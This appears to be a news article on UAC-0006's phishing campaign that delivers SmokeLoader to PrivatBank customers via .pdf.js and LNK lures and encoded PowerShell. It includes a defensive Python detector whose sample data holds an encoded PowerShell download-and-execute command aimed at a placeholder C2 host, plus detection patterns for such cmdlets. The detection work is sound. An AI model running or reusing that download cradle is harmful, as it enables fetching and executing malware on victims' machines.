Ukraine’s largest bank PrivatBank Targeted with SmokeLoader malware
UAC-0006, a financially motivated threat actor, targets PrivatBank customers with advanced phishing attacks. CloudSEK’s research reveals malicious emails containing password-protected archives to deploy SmokeLoader malware, enabling data theft and unauthorized access.
A phishing campaign is underway, targeting customers of PrivatBank, Ukraine’s largest state-owned bank. Cybersecurity researchers at CloudSEK have linked this activity to the financially motivated threat actor group UAC-0006.
The campaign, active since at least November 2024, utilizes deceptive emails containing password-protected archives (such as invoice-related PDFs) disguised as legitimate documents like payment instructions or scanned copies of personal identification.
For example, one phishing lure contains a JavaScript file named Плaтiжнa iнcтpyкцiя №187-ФГ вiд 19.12.2024p.pdf.js (translated as “Payment instruction No. 187-FY dated 19.12.2024p.pdf.js”), which appears to be a legitimate payment document. The purpose of these archives is to deliver malicious payloads designed to compromise victims’ systems, and around two dozen unique instances have been detected in the wild so far.
According to CloudSEK’s blog post, shared with Hackread.com, in this campaign, the attackers have employed versatile techniques to evade detection, including password-protecting the archives and using legitimate system binaries in the infection chain.
Malicious PDF used in the campaign (Via CloudSEK)
The attack typically starts with a phishing email containing an attached password-protected ZIP or RAR file. Upon opening the attachment and entering the password, a malicious JavaScript file is extracted and executed; this file then injects code into a legitimate Windows process, which in turn runs an encoded PowerShell command.
The PowerShell script performs two key functions: it displays a decoy PDF document to the victim, masking the malicious activity, and it contacts the attacker’s command-and-control (C2) server to download and execute the SmokeLoader malware. Researchers assessed that the threat actors have begun using LNK files as lures as well, which directly execute PowerShell scripts to retrieve and run the malware hosted on their C2 servers.
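As an added illustration (not CloudSEK’s or Hackread.com’s code), the following Python snippet sketches how a defender could flag the two observable steps of this chain in mail and endpoint telemetry: a document-then-script double extension on an attachment name, and a script host spawning an encoded PowerShell command that fetches remote content. The sample attachment names, the Sysmon-style process records and the C2 URL in them are constructed for the demo.

```python
import base64
import re

# Constructed sample attachment names and process-creation records (Sysmon-style), not real telemetry.
SAMPLE_ATTACHMENTS = ["Плaтiжнa iнcтpyкцiя №187-ФГ вiд 19.12.2024p.pdf.js", "invoice.pdf", "scan.docx.lnk"]
_ENC = base64.b64encode("Start-Process decoy.pdf; IEX (New-Object Net.WebClient)"
                        ".DownloadString('http://c2.example.invalid/s')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",  # script host running the extracted .js lure
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"ParentImage": r"C:\Windows\explorer.exe",  # ordinary admin use, should not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# <document>.<script|shortcut> double extension, e.g. the campaign's ".pdf.js" lure.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?)\.(?:js|jse|vbs|vbe|wsf|hta|lnk)$", re.I)
# powershell.exe -EncodedCommand and its usual abbreviations, followed by the base64 token.
ENC_SWITCH = re.compile(r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression", "iex ")

def flag_attachments(names):
    """Return the attachment names that carry a document-then-script double extension."""
    return [n for n in names if DOUBLE_EXT.search(n)]

def decode_encoded_powershell(cmdline):
    """UTF-16LE plaintext of an -EncodedCommand argument, or None when absent or not decodable."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_event(event):
    """Reasons one process-creation record matches the JS -> PowerShell -> download chain."""
    reasons = []
    parent, image = event.get("ParentImage", "").lower(), event.get("Image", "").lower()
    if image.endswith("powershell.exe") and parent.endswith(SCRIPT_HOSTS):
        reasons.append("powershell spawned by script host " + parent.rsplit("\\", 1)[-1])
    decoded = decode_encoded_powershell(event.get("CommandLine", ""))
    if decoded is not None:
        reasons.append("encoded command line")
        if any(h in decoded.lower() for h in DOWNLOAD_HINTS):
            reasons.append("decoded payload fetches/executes remote content")
    return reasons
```

Decoding the encoded command before matching matters: the download cmdlets never appear in the raw command line, only in the UTF-16LE plaintext.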
UAC-0006 shows a clear preference for phishing lures with malicious capabilities and makes extensive use of PowerShell in its attacks, delivered through JavaScript, VBScript, and LNK files. Its persistent targeting of PrivatBank customers strongly suggests a focus on financial gain.
Researchers also observed overlaps in the group’s TTPs with EmpireMonkey and the infamous Russia-linked FIN7 group, indicating a connection with Russian APT activity. FIN7, in turn, has links to the Black Basta ransomware operation.
It is also worth noting that SmokeLoader has been actively used in campaigns targeting Ukraine, often attributed to Russian threat actors pursuing espionage and financial gain.
Hackread.com previously reported Fortinet discovering a campaign delivering SmokeLoader malware targeting Taiwanese companies in manufacturing, healthcare, and IT sectors, using phishing emails with malicious attachments. According to Trend Micro’s recent research, Russian threat actors exploited a zero-day vulnerability in the 7-Zip archiving utility to execute malicious code and deploy SmokeLoader. These instances indicate the seriousness of the threat posed by SmokeLoader.
The recent campaign is significant because it can result in the compromise of sensitive personal and financial data, credential harvesting and espionage, and reputational damage to the targeted organization. It also introduces the risk of supply chain attacks, potentially affecting various associated organizations.